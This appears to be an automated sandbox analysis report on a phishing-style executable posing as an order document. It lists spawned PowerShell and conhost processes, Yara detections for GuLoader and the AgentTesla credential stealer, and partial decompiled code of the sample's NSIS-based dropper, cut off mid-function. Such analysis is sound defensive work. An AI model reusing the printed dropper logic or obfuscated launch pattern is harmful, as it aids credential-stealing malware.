Commandline:	powershell.exe 0x69207094 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7220, Parent PID: 7736

General

Target ID:	112
Start time:	09:35:41
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7884, Parent PID: 408

General

Target ID:	113
Start time:	09:35:41
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x2C206B85 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 312, Parent PID: 7884

General

Target ID:	114
Start time:	09:35:41
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 1956, Parent PID: 408

General

Target ID:	115
Start time:	09:35:42
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x30783395 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3984, Parent PID: 1956

General

Target ID:	116
Start time:	09:35:42
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6fb600000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7660, Parent PID: 408

General

Target ID:	117
Start time:	09:35:43
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x30303295 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7480, Parent PID: 7660

General

Target ID:	118
Start time:	09:35:43
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 4764, Parent PID: 408

General

Target ID:	119
Start time:	09:35:44
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x2C2A6B85 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4440, Parent PID: 4764

General

Target ID:	120
Start time:	09:35:44
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6344, Parent PID: 408

General

Target ID:	121
Start time:	09:35:44
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x302C22CC -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3400, Parent PID: 6344

General

Target ID:	122
Start time:	09:35:44
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5696, Parent PID: 408

General

Target ID:	123
Start time:	09:35:45
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x20302BCC -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5316, Parent PID: 5696

General

Target ID:	124
Start time:	09:35:45
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6200, Parent PID: 408

General

Target ID:	125
Start time:	09:35:46
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x2E7230FC -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4192, Parent PID: 6200

General

Target ID:	126
Start time:	09:35:46
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 1308, Parent PID: 408

General

Target ID:	127
Start time:	09:35:47
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x757367D7 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4612, Parent PID: 1308

General

Target ID:	128
Start time:	09:35:47
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7184, Parent PID: 408

General

Target ID:	129
Start time:	09:35:48
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x3332389F -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7036, Parent PID: 7184

General

Target ID:	130
Start time:	09:35:48
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6900, Parent PID: 408

General

Target ID:	131
Start time:	09:35:48
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x43616EC9 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6752, Parent PID: 6900

General

Target ID:	132
Start time:	09:35:48
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6380, Parent PID: 408

General

Target ID:	133
Start time:	09:35:49
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x57696CC1 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 180, Parent PID: 6380

General

Target ID:	134
Start time:	09:35:49
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 4760, Parent PID: 408

General

Target ID:	135
Start time:	09:35:50
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x6F7752D7 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7020, Parent PID: 4760

General

Target ID:	136
Start time:	09:35:50
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6828, Parent PID: 408

General

Target ID:	137
Start time:	09:35:50
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x6F63438D -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5328, Parent PID: 6828

General

Target ID:	138
Start time:	09:35:51
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 1708, Parent PID: 408

General

Target ID:	139
Start time:	09:35:51
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x69723385 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6856, Parent PID: 1708

General

Target ID:	140
Start time:	09:35:51
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7372, Parent PID: 408

General

Target ID:	141
Start time:	09:35:52
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x2C692295 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6804, Parent PID: 7372

General

Target ID:	142
Start time:	09:35:52
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 1260, Parent PID: 408

General

Target ID:	143
Start time:	09:35:53
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x2C692295 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7460, Parent PID: 1260

General

Target ID:	144
Start time:	09:35:53
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7464, Parent PID: 408

General

Target ID:	145
Start time:	09:35:53
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x2C206B85 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7404, Parent PID: 7464

General

Target ID:	146
Start time:	09:35:54
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 936, Parent PID: 408

General

Target ID:	147
Start time:	09:35:54
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x302C22CC -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6812, Parent PID: 936

General

Target ID:	148
Start time:	09:35:54
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 192, Parent PID: 408

General

Target ID:	149
Start time:	09:35:55
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x20302BFC -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 400, Parent PID: 192

General

Target ID:	150
Start time:	09:35:55
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: CasPol.exePID: 6756, Parent PID: 408

General

Target ID:	151
Start time:	09:36:07
Start date:	05/10/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
Imagebase:	0xb20000
File size:	108664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000097.00000000.63070891541.0000000000F00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000097.00000002.67444580363.000000001D574000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1660, Parent PID: 6756

General

Target ID:	152
Start time:	09:36:07
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exePID: 408, Parent PID: 4840COMMON

Execution Graph

Execution Coverage:	4.9%
Dynamic/Decrypted Code Coverage:	17.2%
Signature Coverage:	26.6%
Total number of Nodes:	1862
Total number of Limit Nodes:	59

Executed Functions

Function 0040327D Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 401
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			_entry_() {
				struct _SHFILEINFOW _v716;
				int _v720;
				WCHAR* _v724;
				struct _TOKEN_PRIVILEGES _v732;
				signed int _v736;
				void* _v740;
				int _v744;
				WCHAR* _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				int _v764;
				void* _v772;
				intOrPtr _t53;
				WCHAR* _t57;
				char* _t60;
				void* _t63;
				void* _t65;
				intOrPtr _t67;
				signed int _t69;
				int _t72;
				intOrPtr* _t73;
				int _t74;
				int _t76;
				void* _t100;
				signed int _t117;
				void* _t120;
				void* _t125;
				intOrPtr _t144;
				intOrPtr _t145;
				intOrPtr* _t146;
				void* _t148;
				char* _t149;
				void* _t152;
				int _t153;
				signed int _t157;
				signed int _t162;
				signed int _t167;
				void* _t169;
				void* _t172;
				int* _t174;
				signed int _t180;
				signed int _t183;
				void* _t184;
				WCHAR* _t185;
				int _t191;
				signed int _t194;
				void* _t237;

				_t191 = 0;
				_t184 = 0x20;
				_v720 = 0;
				_v724 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v716.iIcon = 0;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t146 = E00406408(0);
					if(_t146 != 0) {
						 *_t146(0xc00);
					}
				}
				E0040639C("UXTHEME"); // executed
				E0040639C("USERENV"); // executed
				E0040639C("SETUPAPI"); // executed
				E00406408(9);
				_t53 = E00406408(7);
				 *0x7a8a44 = _t53;
				__imp__#17(_t169, _t148);
				__imp__OleInitialize(_t191); // executed
				 *0x7a8af8 = _t53;
				SHGetFileInfoW(0x79ff00, _t191,  &_v716, 0x2b4, _t191); // executed
				E00406032("Overcaustically Setup", L"NSIS Error");
				_t57 = GetCommandLineW();
				_t149 = L"\"C:\\Users\\Arthur\\Desktop\\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe\"";
				E00406032(_t149, _t57);
				 *0x7a8a40 = GetModuleHandleW(_t191);
				_t60 = _t149;
				if(L"\"C:\\Users\\Arthur\\Desktop\\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe\"" == 0x22) {
					_t60 =  &M007B3002;
					_t184 = 0x22;
				}
				_t153 = CharNextW(E00405A13(_t60, _t184));
				_v748 = _t153;
				_t63 =  *_t153;
				if(_t63 == _t191) {
					L28:
					_t185 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t185);
					_t65 = E0040324C(_t153, 0);
					_t219 = _t65;
					if(_t65 != 0) {
						L31:
						DeleteFileW(L"1033"); // executed
						_t67 = E00402DEE(_t221, _v736); // executed
						_v752 = _t67;
						if(_t67 != _t191) {
							L43:
							E004037A1();
							__imp__OleUninitialize();
							_t233 = _v748 - _t191;
							if(_v748 == _t191) {
								__eflags =  *0x7a8ad4 - _t191;
								if( *0x7a8ad4 == _t191) {
									L67:
									_t69 =  *0x7a8aec;
									__eflags = _t69 - 0xffffffff;
									if(_t69 != 0xffffffff) {
										_v744 = _t69;
									}
									ExitProcess(_v744);
								}
								_t72 = OpenProcessToken(GetCurrentProcess(), 0x28,  &_v740);
								__eflags = _t72;
								if(_t72 != 0) {
									LookupPrivilegeValueW(_t191, L"SeShutdownPrivilege",  &(_v732.Privileges));
									_v732.PrivilegeCount = 1;
									_v720 = 2;
									AdjustTokenPrivileges(_v740, _t191,  &_v732, _t191, _t191, _t191);
								}
								_t73 = E00406408(4);
								__eflags = _t73 - _t191;
								if(_t73 == _t191) {
									L65:
									_t74 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t74;
									if(_t74 != 0) {
										goto L67;
									}
									goto L66;
								} else {
									_t76 =  *_t73(_t191, _t191, _t191, 0x25, 0x80040002);
									__eflags = _t76;
									if(_t76 == 0) {
										L66:
										E0040140B(9);
										goto L67;
									}
									goto L65;
								}
							}
							E00405777(_v748, 0x200010);
							ExitProcess(2);
						}
						if( *0x7a8a5c == _t191) {
							L42:
							 *0x7a8aec =  *0x7a8aec | 0xffffffff;
							_v744 = E0040387B( *0x7a8aec);
							goto L43;
						}
						_t174 = E00405A13(_t149, _t191);
						if(_t174 < _t149) {
							L39:
							_t230 = _t174 - _t149;
							_v748 = L"Error launching installer";
							if(_t174 < _t149) {
								_t172 = E004056FA(_t233);
								lstrcatW(_t185, L"~nsu");
								if(_t172 != _t191) {
									lstrcatW(_t185, "A");
								}
								lstrcatW(_t185, L".tmp");
								_t151 = L"C:\\Users\\Arthur\\Desktop";
								if(lstrcmpiW(_t185, L"C:\\Users\\Arthur\\Desktop") != 0) {
									_push(_t185);
									if(_t172 == _t191) {
										E004056DD();
									} else {
										E00405660();
									}
									SetCurrentDirectoryW(_t185);
									_t237 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis" - _t191; // 0x43
									if(_t237 == 0) {
										E00406032(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis", _t151);
									}
									E00406032(0x7a9000, _v740);
									_t154 = "A" & 0x0000ffff;
									 *0x7a9800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t152 = 0x1a;
									do {
										E00406054(_t152, 0x79f700, _t185, 0x79f700,  *((intOrPtr*)( *0x7a8a50 + 0x120)));
										DeleteFileW(0x79f700);
										if(_v756 != _t191 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", 0x79f700, 1) != 0) {
											E00405ED3(_t154, 0x79f700, _t191);
											E00406054(_t152, 0x79f700, _t185, 0x79f700,  *((intOrPtr*)( *0x7a8a50 + 0x124)));
											_t100 = E00405712(0x79f700);
											if(_t100 != _t191) {
												CloseHandle(_t100);
												_v748 = _t191;
											}
										}
										 *0x7a9800 =  *0x7a9800 + 1;
										_t152 = _t152 - 1;
									} while (_t152 != 0);
									E00405ED3(_t154, _t185, _t191);
								}
								goto L43;
							}
							 *_t174 = _t191;
							_t175 =  &(_t174[2]);
							if(E00405AEE(_t230,  &(_t174[2])) == 0) {
								goto L43;
							}
							E00406032(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis", _t175);
							E00406032(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis\\Grusendes\\Stoser\\Unappealingness\\Dermobranchiate", _t175);
							_v764 = _t191;
							goto L42;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t157 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t117 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t162 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
						while( *_t174 != _t157 || _t174[1] != _t117) {
							_t174 = _t174;
							if(_t174 >= _t149) {
								continue;
							}
							break;
						}
						_t191 = 0;
						goto L39;
					}
					GetWindowsDirectoryW(_t185, 0x3fb);
					lstrcatW(_t185, L"\\Temp");
					_t120 = E0040324C(_t153, _t219);
					_t220 = _t120;
					if(_t120 != 0) {
						goto L31;
					}
					GetTempPathW(0x3fc, _t185);
					lstrcatW(_t185, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t185);
					SetEnvironmentVariableW(L"TMP", _t185);
					_t125 = E0040324C(_t153, _t220);
					_t221 = _t125;
					if(_t125 == 0) {
						goto L43;
					}
					goto L31;
				} else {
					goto L6;
				}
				do {
					L6:
					_t162 = 0x20;
					if(_t63 != _t162) {
						L8:
						_t194 = _t162;
						if( *_t153 == 0x22) {
							_t153 = _t153 + 2;
							_t194 = 0x22;
						}
						if( *_t153 != 0x2f) {
							goto L22;
						} else {
